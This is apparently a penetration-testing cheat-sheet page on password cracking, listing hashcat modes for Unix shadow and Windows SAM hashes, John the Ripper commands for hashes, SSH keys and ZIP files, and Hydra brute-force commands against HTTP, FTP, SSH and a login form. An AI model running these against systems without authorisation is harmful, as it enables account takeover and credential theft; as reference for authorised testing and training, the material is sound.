Password cracking

Hash-identifier

hash-identifier and paste the hash

Unshadow

unshadow passwd.txt shadow.txt > unshadow.txt

Hashcat

Usage

hashcat --help | grep <type_of_hash>
hashcat -m <hash_mode> <hash_file> <wordlist> --force #use CPU in kali VM
hashcat64.exe -m <hash_mode> <hash_file> <wordlist> -O #on Windows, use GPU

/etc/shadow file

 500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)        | Operating Systems
3200 | bcrypt $2*$, Blowfish (Unix)                     | Operating Systems
7400 | sha256crypt $5$, SHA256(Unix)                    | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix)                    | Operating-Systems

SAM file

3000 | LM                                               | Operating Systems
1000 | NTLM                                             | Operating Systems

John

Usage

john -wordlist=/usr/share/wordlists/rockyou.txt -format=raw-sha1 hashfile.txt
john --show hashfile.txt

Crack RSA key

locate ssh2john.py
python /usr/share/john/ssh2john.py sshkey.pem > sshkey.pem.hash
john sshkey.pem.hash -wordlist=<wordlist>

ZIP

fcrackzip -u -D -p '<wordlist.txt>' <ch5.zip>

zip2john ch5.zip > ch5.zip.john
john ch5.zip.john

Brute force

Hydra

hydra -l bob -P rockyou.txt http-get://<ip>/protected
hydra -l user -P passlist.txt ftp://<ip>
hydra -l user -P passlist.txt ssh://<ip>
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.100.206 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V

PreviousPost-exploitation NextFile transfers

Last updated 5 years ago

Was this helpful?